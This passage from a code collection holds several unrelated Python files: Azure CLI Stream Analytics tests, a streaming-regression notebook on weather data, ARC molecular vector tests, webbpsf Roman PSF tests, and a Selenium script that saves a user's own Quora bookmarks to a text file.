"stream-analytics function update -n {function_name} -g {rg} \
--job-name {job_name} --properties '{props}'"
)
self.cmd(
"stream-analytics function show -n {function_name} -g {rg} --job-name {job_name}",
checks=[
self.check("name", "{function_name}"),
self.check("properties.binding.script", "function (a, b) {{ return a * b; }}")
]
)
# delete a function
self.cmd("stream-analytics job delete -n {function_name} -g {rg} --job-name {job_name} --yes")
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_")
def test_subscription_inspect(self):
self.kwargs.update({
"location": "westus"
})
self.cmd(
"stream-analytics subscription inspect -l {location}",
checks=[
self.check("length(value)", 2),
self.check("value[0].type", "Microsoft.StreamAnalytics/quotas")
]
)
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_")
def test_cluster_crud(self):
self.kwargs.update({
"cluster": "cli-cluster",
"capacity1": 36,
"capacity2": 72,
})
# create a cluster
self.cmd(
"stream-analytics cluster create -n {cluster} -g {rg} --sku name=Default capacity={capacity1}",
checks=[
self.check("sku.capacity", 36),
self.check("type", "Microsoft.StreamAnalytics/clusters"),
]
)
# retrieve/update a cluster
self.cmd(
"stream-analytics cluster list -g {rg}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{cluster}"),
]
)
self.cmd("stream-analytics cluster update -n {cluster} -g {rg} --sku capacity={capacity2}")
self.cmd(
"stream-analytics cluster show -n {cluster} -g {rg}",
checks=[
self.check("sku.capacity", 72),
self.check("name", "{cluster}"),
]
)
# delete a cluster
self.cmd("stream-analytics cluster delete -n {cluster} -g {rg} --yes")
@ResourceGroupPreparer(name_prefix="cli_test_stream_analytics_")
@StorageAccountPreparer(name_prefix="pl", kind="StorageV2")
def test_private_endpoint_crud(self, storage_account):
self.kwargs.update({
"sa": storage_account,
"pe": "cli-pe",
"cluster": "cli-cluster",
})
self.cmd("stream-analytics cluster create -n {cluster} -g {rg} --sku name=Default capacity=36")
# prepare connections
self.kwargs["sa_id"] = self.cmd('storage account show -n {sa} -g {rg}').get_output_in_json()["id"]
self.kwargs["group_id"] = self.cmd("storage account private-link-resource list -g {rg} \
--account-name {sa}").get_output_in_json()[0]["groupId"]
self.kwargs["connections"] = json.dumps([{
"privateLinkServiceId": self.kwargs["sa_id"],
"groupIds": [self.kwargs["group_id"]]
}])
self.cmd(
"stream-analytics private-endpoint create -n {pe} -g {rg} \
--cluster-name {cluster} --connections '{connections}'",
checks=[
self.check("name", "{pe}"),
self.check("type", "Microsoft.StreamAnalytics/clusters/privateEndpoints"),
]
)
self.cmd(
"stream-analytics private-endpoint list -g {rg} --cluster-name {cluster}",
checks=[
self.check("length(@)", 1),
self.check("@[0].name", "{pe}"),
]
)
self.cmd(
"stream-analytics private-endpoint show -n {pe} -g {rg} --cluster-name {cluster}",
checks=[
self.check("name", "{pe}"),
self.check("type", "Microsoft.StreamAnalytics/clusters/privateEndpoints"),
]
)
self.cmd("stream-analytics private-endpoint delete -n {pe} -g {rg} --cluster-name {cluster} --yes")
|
src/stream-analytics/azext_stream_analytics/tests/latest/test_stream_analytics_commands.py
|
| 0.52342 | 0.177597 |
#%%
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from sklearn.preprocessing import MinMaxScaler
from skmultiflow.data import DataStream
from skmultiflow.evaluation import EvaluatePrequential
from skmultiflow.trees import RegressionHAT, RegressionHoeffdingTree
import samknnreg
from importlib import reload
from samknnreg import SAMKNNRegressor
import matplotlib.pyplot as plt
#%%
print("Reading dataset...")
df = pd.read_csv(
"weatherHistory.csv",
parse_dates={"datetime": ["Formatted Date"]},
date_parser=pd.to_datetime,
index_col="datetime")
print("done!")
#%%
df.index = pd.to_datetime(df.index, utc=True)
df.drop(columns=["Summary", "Precip Type", "Daily Summary", "Loud Cover"], inplace=True, errors="ignore")
df.info()
#%%
df.head()
#%%
scaler = MinMaxScaler()
tdf = pd.DataFrame(scaler.fit_transform(df.values), columns=df.columns.copy(), index=df.index)
#%%
fig, ax = plt.subplots(ncols=2)
df.drop(columns=["Pressure (millibars)", "Wind Bearing (degrees)"]).resample("W").mean().plot(ax=ax[0], title="unscaled")
tdf.drop(columns=["Pressure (millibars)", "Wind Bearing (degrees)"]).resample("W").mean().plot(ax=ax[1], title="scaled")
#%%
tdf.info()
X = tdf[["Pressure (millibars)", "Humidity", "Wind Speed (km/h)"]].resample("6H").mean()
y = tdf[["Temperature (C)"]].resample("6H").max()
X.plot(subplots=True, layout=(1,3))
y.plot()
#%%
reload(samknnreg)
from samknnreg import SAMKNNRegressor
sam = SAMKNNRegressor()
hat = RegressionHAT()
rht = RegressionHoeffdingTree()
ds = DataStream(X, y=y)
ds.prepare_for_use()
evaluator = EvaluatePrequential(show_plot=True,
n_wait=730,
batch_size=28,
metrics=[
'mean_square_error',
'true_vs_predicted'])
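# Note on the settings above (assumption based on skmultiflow's prequential scheme):
# each batch of 28 samples is used for testing first and then for training, and the
# reported metrics/plot are refreshed every 730 processed samples.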
#%%
evaluator.evaluate(
stream=ds,
model=[sam, rht, hat ],
model_names=["SAM", "Hoeffding Tree Regressor", "Hoeffding Tree Regressor (Adaptive)"])
#%%
|
dataset.py
|
| 0.300027 | 0.36659 |
import math
import unittest
import arc.species.converter as converter
import arc.species.vectors as vectors
from arc.species.species import ARCSpecies
class TestVectors(unittest.TestCase):
"""
Contains unit tests for the vectors module
"""
@classmethod
def setUpClass(cls):
"""
A method that is run before all unit tests in this class.
"""
cls.maxDiff = None
def test_get_normal(self):
"""Test calculating a normal vector"""
v1 = [6, 0, 0]
v2 = [0, 3, 0]
n = vectors.get_normal(v1, v2)
self.assertEqual(n[0], 0)
self.assertEqual(n[1], 0)
self.assertEqual(n[2], 1)
v1 = [5, 1, 1]
v2 = [1, 8, 2]
n = vectors.get_normal(v1, v2)
expected_n = vectors.unit_vector([-6, -9, 39])
for ni, expected_ni in zip(n, expected_n):
self.assertEqual(ni, expected_ni)
def test_get_theta(self):
"""Test calculating the angle between two vectors"""
v1 = [-1.45707856 + 0.02416711, -0.94104506 - 0.17703194, -0.20275830 - 0.08644641]
v2 = [-0.03480906 + 0.02416711, 1.11948179 - 0.17703194, -0.82988874 - 0.08644641]
theta = vectors.get_theta(v1, v2)
self.assertAlmostEqual(theta, 1.8962295, 5)
self.assertAlmostEqual(theta * 180 / math.pi, 108.6459, 3)
def test_unit_vector(self):
"""Test calculating a unit vector"""
v1 = [1, 0, 0]
self.assertEqual(vectors.unit_vector(v1)[0], 1.) # trivial
self.assertEqual(vectors.unit_vector(v1)[1], 0.) # trivial
self.assertEqual(vectors.unit_vector(v1)[2], 0.) # trivial
v2 = [1, 1, 1]
self.assertAlmostEqual(vectors.unit_vector(v2)[0], (1 / 3) ** 0.5)
self.assertAlmostEqual(vectors.unit_vector(v2)[1], (1 / 3) ** 0.5)
self.assertAlmostEqual(vectors.unit_vector(v2)[2], (1 / 3) ** 0.5)
def test_set_vector_length(self):
"""Test changing a vector's length"""
v1 = [1, 0, 0]
self.assertEqual(vectors.get_vector_length(v1), 1)
v1_transformed = vectors.set_vector_length(v1, 5)
self.assertAlmostEqual(vectors.get_vector_length(v1_transformed), 5)
v1 = [1, 1, 1]
self.assertEqual(vectors.get_vector_length(v1), 3 ** 0.5)
v1_transformed = vectors.set_vector_length(v1, 5)
self.assertAlmostEqual(vectors.get_vector_length(v1_transformed), 5)
label = 'CNCC'
pivot = 0
xyz = {'symbols': ('N', 'C', 'C', 'C', 'H', 'H', 'H', 'H', 'H', 'H', 'H', 'H', 'H'),
'isotopes': (14, 12, 12, 12, 1, 1, 1, 1, 1, 1, 1, 1, 1),
'coords': ((0.7419854952964929, -0.18588322859265055, -0.8060295165375653),
(-0.38476668007897186, -0.8774643553523614, -0.1815530887172187),
(-1.4977348513273125, 0.05995564693605262, 0.26652181022311233),
(1.5633235727172392, 0.5360966415350092, 0.15477859056711452),
(-0.04458112063725271, -1.4936027355391557, 0.6589418973690523),
(-0.7986335015469359, -1.5715787743431335, -0.9219907626214912),
(-2.348455608682208, -0.5210498432021002, 0.6375394558854425),
(-1.8523669868240424, 0.6790455638159553, -0.5642494434208211),
(-1.170505453235269, 0.7210016856743618, 1.0746899133307615),
(2.4283037770451084, 0.9651590522064675, -0.36083882142892065),
(1.945994527876002, -0.1322800197070601, 0.9328203647772167),
(1.0178974719106297, 1.3595978302624294, 0.6250164549219148),
(0.39953935748654607, 0.4610025363062083, -1.5156468543485933))}
mol = ARCSpecies(label='CNCC', xyz=xyz).mol
v1 = vectors.get_lp_vector(label, mol, xyz, pivot)
self.assertAlmostEqual(vectors.get_vector_length(v1), 1) # should return a unit vector
v1_transformed = vectors.set_vector_length(v1, 5)
self.assertAlmostEqual(vectors.get_vector_length(v1_transformed), 5)
def test_rotate_vector(self):
"""Test rotating a vector"""
point_a, point_b, normal, theta = [0, 0, 0], [0, 0, 1], [0, 0, 1], 90.0 * math.pi / 180 # trivial, no rotation
new_vector = vectors.rotate_vector(point_a, point_b, normal, theta)
self.assertEqual(new_vector, [0, 0, 1])
point_a, point_b, normal, theta = [0, 0, 0], [1, 0, 0], [0, 0, 1], 90.0 * math.pi / 180 # rot x to y around z
new_vector = vectors.rotate_vector(point_a, point_b, normal, theta)
self.assertAlmostEqual(new_vector[0], 0, 5)
self.assertAlmostEqual(new_vector[1], 1, 5)
self.assertAlmostEqual(new_vector[2], 0, 5)
point_a, point_b, normal, theta = [0, 0, 0], [3, 5, 0], [4, 4, 1], 1.2
new_vector = vectors.rotate_vector(point_a, point_b, normal, theta)
self.assertAlmostEqual(new_vector[0], 2.749116, 5)
self.assertAlmostEqual(new_vector[1], 4.771809, 5)
self.assertAlmostEqual(new_vector[2], 1.916297, 5)
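    # Reference sketch (assumption: rotate_vector() behaves like a standard Rodrigues
    # rotation of the vector point_b - point_a about the unit `normal` by theta):
    #
    #     import numpy as np
    #     def rodrigues_rotate(v, k, theta):
    #         k = np.asarray(k, dtype=float) / np.linalg.norm(k)
    #         v = np.asarray(v, dtype=float)
    #         return (v * np.cos(theta)
    #                 + np.cross(k, v) * np.sin(theta)
    #                 + k * np.dot(k, v) * (1 - np.cos(theta)))
    #
    # e.g. rodrigues_rotate([1, 0, 0], [0, 0, 1], np.pi / 2) is approximately [0, 1, 0],
    # matching the second case checked above.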
def test_get_vector(self):
"""Test getting a vector between two atoms in the molecule"""
xyz1 = converter.str_to_xyz("""O 0.0 0.0 0.0
N 1.0 0.0 0.0""") # trivial
vector = vectors.get_vector(pivot=0, anchor=1, xyz=xyz1)
self.assertAlmostEqual(vector[0], 1.0, 5)
self.assertAlmostEqual(vector[1], 0.0, 5)
self.assertAlmostEqual(vector[2], 0.0, 5)
xyz2 = converter.str_to_xyz("""O -0.39141517 -1.49218505 0.23537907
N -1.29594218 0.36660772 -0.33360920
C -0.24369399 -0.21522785 0.47237314
C 1.11876670 0.24246665 -0.06138419
H -0.34055624 0.19728442 1.48423848
H 1.27917500 -0.02124533 -1.11576163
H 1.93896021 -0.20110894 0.51754953
H 1.21599040 1.33219465 0.01900272
H -2.12405283 -0.11420423 0.01492411
H -1.15723190 -0.09458204 -1.23271202""") # smiles='NC([O])(C)'
vector = vectors.get_vector(pivot=1, anchor=2, xyz=xyz2)
self.assertAlmostEqual(vector[0], 1.052248, 5)
self.assertAlmostEqual(vector[1], -0.581836, 5)
self.assertAlmostEqual(vector[2], 0.805982, 5)
def test_get_lp_vector(self):
"""Test the lone pair vector"""
xyz1 = converter.str_to_xyz("""O 1.13971727 -0.35763357 -0.91809799
N -0.16022228 -0.63832421 -0.32863338
C -0.42909096 0.49864538 0.54457751
H -1.36471297 0.33135829 1.08632108
H 0.37059419 0.63632068 1.27966893
H -0.53867601 1.41749835 -0.03987146
H 0.03832076 -1.45968957 0.24914206
H 0.94407000 -0.42817536 -1.87310674""")
spc1 = ARCSpecies(label='tst1', smiles='CN(O)', xyz=xyz1)
vector = vectors.get_lp_vector(label='tst1', mol=spc1.mol, xyz=xyz1, pivot=1)
self.assertAlmostEqual(vector[0], -0.7582151013592212, 5)
self.assertAlmostEqual(vector[1], -0.14276808320949216, 5)
self.assertAlmostEqual(vector[2], -0.6361816835523585, 5)
self.assertAlmostEqual((sum([vi ** 2 for vi in vector])) ** 0.5, 1)
# puts the following dummy atom in xyz1: 'Cl -0.91844 -0.78109 -0.96482'
xyz2 = converter.str_to_xyz("""N -0.70735114 0.81971647 0.24999886
C 0.58016992 0.65919122 -0.42405305
C 1.44721132 -0.43727777 0.17945348
C -1.63900905 -0.25796649 -0.04936095
H 1.11974047 1.60931343 -0.33768790
H 0.43764604 0.48458543 -1.49689220
H 1.00255021 -1.42757899 0.04242741
H 2.42947502 -0.44523307 -0.30432399
H 1.60341053 -0.27376799 1.25093890
H -1.81252045 -0.34624671 -1.12667881
H -2.60396918 -0.04100469 0.41960198
H -1.29274859 -1.22036999 0.33877281
H -0.56460509 0.87663914 1.25780346""")
spc2 = ARCSpecies(label='tst2', smiles='CNCC', xyz=xyz2)
vector = vectors.get_lp_vector(label='tst2', mol=spc2.mol, xyz=xyz2, pivot=0)
self.assertAlmostEqual(vector[0], -0.40585301456248446, 5)
self.assertAlmostEqual(vector[1], 0.8470158636326891, 5)
self.assertAlmostEqual(vector[2], -0.34328917449449764, 5)
self.assertAlmostEqual((sum([vi ** 2 for vi in vector])) ** 0.5, 1)
# puts the following dummy atom in xyz1: 'Cl -1.1132 1.666732 -0.09329'
if __name__ == '__main__':
unittest.main(testRunner=unittest.TextTestRunner(verbosity=2))
|
arc/species/vectorsTest.py
|
| 0.815416 | 0.748858 |
import os
import numpy as np
import pytest
from webbpsf import roman, measure_fwhm
from astropy.table import Table
from numpy import allclose
GRISM_FILTERS = roman.GRISM_FILTERS
PRISM_FILTERS = roman.PRISM_FILTERS
def detector_substr(detector):
"""
change detector string to match file format
(e.g., "SCA01" -> "SCA_1")
"""
return f"{detector[:3]}_{str(int((detector[3:])))}"
def pupil_path(wfi, mask=None):
"""
dynamically generate current pupil path for a given WFI instance
"""
mask = (wfi._pupil_controller._get_filter_mask(wfi.filter) if mask is None
else mask)
detector = detector_substr(wfi.detector)
base = wfi._pupil_controller._pupil_basepath
file = wfi._pupil_controller.pupil_file_formatters[mask]
return os.path.join(base, file).format(detector)
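# Illustrative note (file name is hypothetical): for wfi.detector == "SCA01" the helper
# formats the detector as "SCA_1" and joins the pupil controller's base path with the
# formatter registered for the active mask, e.g. something like
# "<pupil_basepath>/<mask formatter rendered for SCA_1>.fits"; the exact file names come
# from webbpsf's bundled data, not from this test module.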
def test_WFI_psf():
"""
Test that instantiating WFI works and can compute a PSF without
raising any exceptions
"""
wfi = roman.WFI()
wfi.calc_psf(fov_pixels=4)
def test_WFI_filters():
wfi = roman.WFI()
filter_list = wfi.filter_list
for filter in filter_list:
wfi.filter = filter
wfi.calc_psf(fov_pixels=4, oversample=1, nlambda=3)
def test_aberration_detector_position_setter():
detector = roman.FieldDependentAberration(4096, 4096)
with pytest.raises(ValueError) as excinfo:
detector.field_position = (-1, 1)
assert 'pixel_x' in str(excinfo.value), 'Failed to raise exception for small out-of-bounds ' \
'x pixel position'
with pytest.raises(ValueError) as excinfo:
detector.field_position = (4096+1, 1)
assert 'pixel_x' in str(excinfo.value), 'Failed to raise exception for large out-of-bounds ' \
'x pixel position'
with pytest.raises(ValueError) as excinfo:
detector.field_position = (1, -1)
assert 'pixel_y' in str(excinfo.value), 'Failed to raise exception for small out-of-bounds ' \
'y pixel position'
with pytest.raises(ValueError) as excinfo:
detector.field_position = (1, 4096+1)
assert 'pixel_y' in str(excinfo.value), 'Failed to raise exception for large out-of-bounds ' \
'y pixel position'
valid_pos = (1.0, 1.0)
detector.field_position = valid_pos
assert detector._field_position == valid_pos, 'Setting field position through setter did not ' \
'update private `_field_position` value'
def test_WFI_fwhm():
"""
Test that computed PSFs are physically realistic, at least relatively.
Loose test...
"""
wfi = roman.WFI()
wfi.pupilopd = None
wfi.options['jitter'] = None
wfi.filter = 'F062'
    fwhm_f062 = measure_fwhm(wfi.calc_psf(oversample=6))
wfi.filter = 'F184'
    fwhm_f184 = measure_fwhm(wfi.calc_psf(oversample=6))
assert (4.0 > fwhm_f184/fwhm_f062 > 2.0)
def test_WFI_pupil_controller():
wfi = roman.WFI()
for detector in wfi.detector_list:
wfi.detector = detector
assert os.path.isfile(pupil_path(wfi)), f"Pupil file missing: {pupil_path(wfi)}"
# Test detector change was successful
assert wfi.detector == detector, "WFI detector was not set correctly"
assert wfi.pupil == pupil_path(wfi), "pupil path was not set correctly"
# Test pupil mask lock/unlock
for mask in wfi.pupil_mask_list:
# test lock
wfi.lock_pupil_mask(mask)
assert wfi.pupil == pupil_path(wfi, mask), "Pupil path was not set correctly"
# introduce differing filter to modify
wfi.filter = "PRISM" if mask != "PRISM" else "F062"
assert wfi._pupil_controller._pupil_mask == wfi.pupil_mask, "Pupil mask was not set correctly"
# test unlock
wfi.unlock_pupil_mask()
assert wfi.pupil == pupil_path(wfi), f"Pupil mask unlock failed"
assert wfi._pupil_controller._auto_pupil, "Pupil is locked and should not be"
assert wfi._pupil_controller._auto_pupil_mask, "Pupil mask is locked and should not be"
# Test pupil lock/unlock
with pytest.raises(FileNotFoundError) as err:
assert wfi.lock_pupil("file_that_does_not_exist.fits"), "FileNotFoundError was not raised"
this_file = __file__
wfi.lock_pupil(this_file)
assert wfi.pupil == this_file, "Pupil did not lock to proper file."
wfi.unlock_pupil()
assert wfi.pupil == pupil_path(wfi), f"Pupil unlock failed."
assert wfi._pupil_controller._auto_pupil, "Pupil is locked and should not be"
assert wfi._pupil_controller._auto_pupil_mask, "Pupil mask is locked and should not be"
# Test effect of changing the filter on pupil path
for filter in wfi.filter_list:
wfi.filter = filter
assert wfi.pupil == pupil_path(wfi), f"Pupil was not set to correct value for filter {filter}"
# Test persistence of pupil and pupil mask locks through a PSF calculation
wfi2 = roman.WFI()
wfi2.detector = detector
valid_pos = (4000, 1000)
wfi2.detector_position = valid_pos
wfi2.filter = "F129"
wfi2.lock_pupil_mask("GRISM")
wfi2.filter = "F129"
assert wfi2.pupil == pupil_path(wfi2, "GRISM"), "Pupil path was not set correctly"
wfi2.calc_psf(monochromatic=1.3e-6, fov_pixels=4)
assert wfi.pupil_mask == "GRISM", "Pupil mask changed during PSF calculation"
assert wfi2.pupil == pupil_path(wfi2, "GRISM"), "Pupil path changed during PSF calculation"
def test_WFI_detector_position_setter():
wfi = roman.WFI()
wfi.detector = 'SCA01'
valid_pos = (4000, 1000)
wfi.detector_position = valid_pos
assert wfi._detectors[wfi._detector].field_position == valid_pos, (
"Setting field position through Instrument.detector_position did not update field_position "
"for the detector's aberration optic"
)
assert wfi.detector_position == valid_pos, "`detector_position` getter doesn't reflect " \
"assignment to setter"
def test_WFI_includes_aberrations():
wfi = roman.WFI()
wfi.detector = 'SCA01'
osys = wfi.get_optical_system()
assert isinstance(osys[2], roman.FieldDependentAberration), (
"Third plane of Roman WFI optical system should be the "
"field dependent aberration virtual optic"
)
def test_swapping_modes(wfi=None):
if wfi is None:
wfi = roman.WFI()
    # reuse the module-level detector_substr() and pupil_path() helpers defined above
tests = [
# [filter, mode, pupil_file]
['F146', 'imaging', pupil_path],
['F213', 'imaging', pupil_path],
[PRISM_FILTERS[0], 'prism', pupil_path],
[GRISM_FILTERS[0], 'grism', pupil_path],
]
for test_filter, test_mode, test_pupil in tests:
wfi.filter = test_filter
fail_str = (f"failed on {test_filter}, {test_mode}, "
f"{test_pupil(wfi).split('/')[-1]}")
assert wfi.filter == test_filter, fail_str
assert wfi.mode == test_mode, fail_str
assert wfi._current_aberration_file == wfi._aberration_files[test_mode], fail_str
assert wfi.pupil == test_pupil(wfi), fail_str
def test_custom_aberrations():
wfi = roman.WFI()
# Use grism aberration_file for testing
test_aberration_file = wfi._aberration_files['grism']
# Test override
# -------------
wfi.lock_aberrations(test_aberration_file)
for filter in wfi.filter_list:
wfi.filter = filter
assert wfi._current_aberration_file == test_aberration_file, "Filter change caused override to fail"
# Test Release Override
# ---------------------
wfi.unlock_aberrations()
assert wfi._aberration_files['custom'] is None, "Custom aberration file not deleted on override release."
test_swapping_modes(wfi)
def test_WFI_limits_interpolation_range():
wfi = roman.WFI()
det = wfi._detectors['SCA01']
det.get_aberration_terms(1.29e-6)
det.field_position = (0, 0)
det.get_aberration_terms(1.29e-6)
with pytest.raises(ValueError) as excinfo:
det.field_position = (500000, 0)
assert 'Requested pixel_x position' in str(excinfo.value), (
"FieldDependentAberration did not error on out-of-bounds field point"
)
with pytest.raises(ValueError) as excinfo:
det.field_position = (-1, 0)
assert 'Requested pixel_x position' in str(excinfo.value), (
"FieldDependentAberration did not error on out-of-bounds field point"
)
with pytest.raises(ValueError) as excinfo:
det.field_position = (0, 500000)
assert 'Requested pixel_y position' in str(excinfo.value), (
"FieldDependentAberration did not error on out-of-bounds field point"
)
with pytest.raises(ValueError) as excinfo:
det.field_position = (0, -1)
assert 'Requested pixel_y position' in str(excinfo.value), (
"FieldDependentAberration did not error on out-of-bounds field point"
)
det.field_position = (2048, 2048)
# Get min and max valid wavelengths from aberration file
zern = Table.read(wfi._aberration_files[wfi.mode], format='ascii.csv')
min_wv = zern['wavelength'][0] * 1e-6 # convert from micron to meter
max_wv = zern['wavelength'][-1] * 1e-6
# Test that get_aberration_terms() uses an approximated wavelength when
# called with an out-of-bounds wavelength.
too_lo_wv = min_wv * .9; too_hi_wv = max_wv / .9
valid_wv = np.mean([min_wv, max_wv])
assert allclose(det.get_aberration_terms(min_wv),
det.get_aberration_terms(too_lo_wv)), (
"Aberration below wavelength range did not return closest value."
)
assert allclose(det.get_aberration_terms(max_wv),
det.get_aberration_terms(too_hi_wv)), (
"Aberration above wavelength range did not return closest value."
)
# Test border pixels outside the ref data. In Cycle 9, (0, 37) is the first
# pixel, so we check if (0, 0) is approximated to it as the nearest point.
det.field_position = (0, 0)
coefficients_outlier = det.get_aberration_terms(valid_wv)
det.field_position = (0, 37)
coefficients_data = det.get_aberration_terms(valid_wv)
assert np.allclose(coefficients_outlier, coefficients_data), "nearest point extrapolation " \
"failed for outlier field point"
def test_CGI_detector_position():
""" Test existence of the CGI detector position etc, and that you can't set it."""
cgi = roman.CGI()
valid_pos = (512,512)
assert cgi.detector_position == valid_pos, "CGI detector position isn't as expected"
with pytest.raises(RuntimeError) as excinfo:
cgi.detector_position = valid_pos
    assert 'not adjustable' in str(excinfo.value), ("Failed to raise exception for "
                                                    "trying to change CGI detector position.")
def test_CGI_psf(display=False):
"""
Just test that instantiating CGI works and can compute a PSF without raising
any exceptions
"""
char_spc = roman.CGI()
char_spc.mode = 'CHARSPC_F660'
    # print('Reading instrument data from {:s}'.format(char_spc._WebbPSF_basepath))
    # print('Filter list: {:}'.format(char_spc.filter_list))
monopsf = char_spc.calc_psf(nlambda=1, display=False)
if display:
roman.poppy.display_psf(monopsf)
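# Editor's note: the functions above are plain pytest tests; a typical (assumed)
# way to run just this module would be, for example:
#     pytest webbpsf/tests/test_roman.py -k "WFI" -v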
|
webbpsf/tests/test_roman.py
|
| 0.770033 | 0.359224 |
from selenium import webdriver
from selenium.webdriver import ActionChains
from bs4 import BeautifulSoup
from time import sleep
from selenium.webdriver.common.keys import Keys
from file_io import *
import textwrap
print('Thank you for using Simple Quora Backup')
print('This will backup your BOOKMARKS to a text file in the simplest form, ')
print('so there are no images, links, etc, just simple text')
print('This is just in case Quora disappears some day :)')
print('\n')
print('NOTE:', 'Chrome WebDriver is buggy so it gets stuck sometimes during login or loading pages')
print('if that happens just close it and run the script again.')
print('\n')
boolean = True
osType = None
bit = None
path = None
while boolean:
osType = input('Please type in your operating system (windows, mac, linux)')
if osType == 'windows':
path = "WebDriver/win/chromedriver"
break
    elif osType == 'mac':
        path = "WebDriver/mac/chromedriver"
        break
    elif osType == 'linux':
        while boolean:
            bit = input('Please choose your version (64-bit, 32-bit)')
            if bit in ('64', '64-bit'):
                path = "WebDriver/linux/64/chromedriver"
                break
            elif bit in ('32', '32-bit'):
                path = "WebDriver/linux/32/chromedriver"
break
break
email = None
password = None
while boolean:
email = input('Please type in your Quora account email: ')
    if email:
break
while boolean:
password = input('Please type in your Quora account password: ')
    if password:
break
# print(email + ' ' + password)
numOfScrolls = 0
num = 0
while boolean:
numOfScrolls1 = input('How many Bookmarks do you have (approximately)?')
    if numOfScrolls1.strip().isdigit():
        numOfScrolls = int(numOfScrolls1)
        if numOfScrolls >= 10:
            num = numOfScrolls // 10
else:
num = 2
break
print('NOTE: Saving BOOKMARKS is very slow, because Quora has lazy loading and it forbids scraping.')
print('The program has to manually scroll to load and then expand all the BOOKMARKS')
print('I had 290-300 answers and it took 11-12 minutes so you do the math :)')
print('\n')
print('There is no easy way around this, so go grab a cup of coffee/tea and do something else until this is done')
print('To do this by hand would take you several HOURS, instead this will only take several MINUTES.')
print('\n')
print('Starting Chrome WebDriver...')
browser = webdriver.Chrome(executable_path=path)
browser.get('https://www.quora.com/bookmarked_answers')
browser.maximize_window()
sleep(2)
quoraElems = browser.find_elements_by_xpath("//form/div/div/input")
emailQuora = quoraElems[0]
passwordQuora = quoraElems[1]
emailQuora.send_keys(email)
passwordQuora.send_keys(password)
passwordQuora.send_keys(Keys.RETURN)
sleep(2)
browser.get('https://www.quora.com/bookmarked_answers')
sleep(3)
print('Scrolling to load all BOOKMARKS...')
i = 0
while i < num:
browser.execute_script('window.scrollTo(0, document.body.scrollHeight);')
sleep(4)
i += 1
# identifies answers to be expanded by the '(more)' element
answers = browser.find_elements_by_link_text('(more)')
print('Expanding BOOKMARKS...')
j = 1
for answer in answers:
if j < len(answers):
if j == 1:
browser.execute_script('window.scrollTo(0, 0);')
ActionChains(browser).click(answers[0]).perform()
j += 1
elif j < len(answers) - 1:
ActionChains(browser).move_to_element(answers[j]).click(answer).perform()
j += 1
if j == len(answers) - 1:
ActionChains(browser).move_to_element(answers[j]).click(answers[j-1]).perform()
continue
if j == len(answers) - 1:
browser.execute_script('window.scrollTo(0, document.body.scrollHeight);')
ActionChains(browser).click(answers[j]).perform()
break
sleep(2)
# after the scrolling and the clicking is done, the scraping can begin :)
html = browser.page_source
browser.close()
browser = None
soup = BeautifulSoup(html, 'html.parser')
# create the directory and the reading_list text file which has all the content in it
dir_name = 'Quora Reading List'
create_project_dir(dir_name)
create_data_file(dir_name, '')
print('Saving to file (reading_list.txt)...')
count = 1
# iterate through all items in the list
for item_list in soup.find_all('div', {'class': 'PagedList ReadLaterList'}):
for list_item in item_list.find_all('div', {'class': 'pagedlist_item'}):
# get question title
question_title = list_item.find('span', {'class': 'question_text'})
# In case it's not a question (probably blog post)
if question_title is None:
question_title = list_item.find('a', {'class': 'BoardItemTitle'})
# write the question title to the text file
content = str(count) + ' QUESTION TITLE: ' + question_title.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
count += 1
# check for expanded question/answer text
answer_content = list_item.find('div', {'class': 'ExpandedQText ExpandedAnswer'})
if answer_content is None:
# In case it's not an answer (probably a blog post)
answer_content = list_item.find('span', {'class': 'inline_editor_value'})
if answer_content is not None:
rendered_qtext_all = answer_content.find_all('span', {'class': 'rendered_qtext'})
# In case it's neither
else:
continue
else:
rendered_qtext_all = answer_content.find_all('span', {'class': 'rendered_qtext'})
if rendered_qtext_all is not None:
for piece in rendered_qtext_all:
plain_text = False
for element in piece:
# check for paragraphs
if element.name == 'p':
elem = element.attrs
if 'qtext_para' in elem['class']:
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
# check for ordered lists
elif element.name == 'ol':
ol_elements = element.find_all('li')
counter = 1
for li in ol_elements:
content = str(counter) + ' ' + li.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
counter += 1
# check for code-boxes (which are ordered lists)
elif element.name == 'pre':
sub_element = element.find('ol', {'class': 'linenums'})
if sub_element.name == 'ol':
ol_elements = sub_element.find_all('li')
counter = 1
for li in ol_elements:
content = str(counter) + ' ' + li.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
counter += 1
# check for unordered lists
elif element.name == 'ul':
ul_elements = element.find_all('li')
for li in ul_elements:
content = li.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
# check for images
elif element.name == 'div':
elem = element.attrs
if 'qtext_image_wrapper' in elem['class']:
writing = 'img source'.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
# check for HTML breaks
elif element.name == 'br':
continue
# check for plain text
else:
if element.name == 'hr':
continue
elif element.name == 'blockquote':
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
elif element.name == 'span':
atr = element.attrs
if 'qlink_conainer' in atr['class']:
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
else:
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
elif element.name == 'i':
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
elif element.name == 'b':
content = element.text
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
else:
content = str(element)
content1 = textwrap.fill(content, 66)
writing = content1.encode('utf-8')
append_to_file('Quora Reading List' + '/reading_list.txt', writing)
continue
print('Done.')
print('Your BOOKMARKS are saved in Quora Reading List/reading_list.txt')
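# --- Editor's illustrative sketch (defined only, never called by this script) --
# The fixed sleep() calls above are fragile on slow connections. A hedged
# alternative is an explicit wait; the locator reuses the '(more)' link text this
# script already depends on, everything else here is an assumption.
def wait_for_more_links(driver, timeout=20):
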